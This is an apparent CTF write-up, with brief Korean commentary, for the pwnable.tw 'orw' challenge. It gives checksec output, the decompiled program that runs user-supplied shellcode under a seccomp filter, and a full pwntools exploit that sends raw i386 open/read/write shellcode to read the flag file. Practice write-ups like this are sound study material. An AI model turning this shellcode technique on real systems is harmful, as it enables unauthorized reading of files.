[pwnablw.tw] orw

checksec

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

 

description

---

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  (shellcode)();
  return 0;
}

 

쉘코드를 받고 실행시켜 줍니다

seccomp이 걸려있어 rule을 확인해보면 open, read, write이 열려 있어서 문제 이름처럼 orw 쉘코드 작성해주면 됩니다

 

exploit code

---

from pwn import *

p = remote("chall.pwnable.tw", 10001)

ru = lambda a : p.recvuntil(a)

sc = b"\xb8\x03\x00\x00\x00"
sc += b"\xbb\x00\x00\x00\x00"
sc += b"\xb9\x00\xa1\x04\x08"
sc += b"\xba\x0f\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\xbb\x00\xa1\x04\x08"
sc += b"\xb8\x05\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\x89\xc3"
sc += b"\xb8\x03\x00\x00\x00"
sc += b"\xb9\x00\xa1\x04\x08"
sc += b"\xba\x50\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\xb8\x04\x00\x00\x00"
sc += b"\xbb\x01\x00\x00\x00"
sc += b"\xb9\x00\xa1\x04\x08"
sc += b"\xba\x50\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\x90" * (200 - len(sc))

ru(b":")
p.send(sc)
sleep(0.1)
p.send(b"/home/orw/flag\x00")

p.interactive()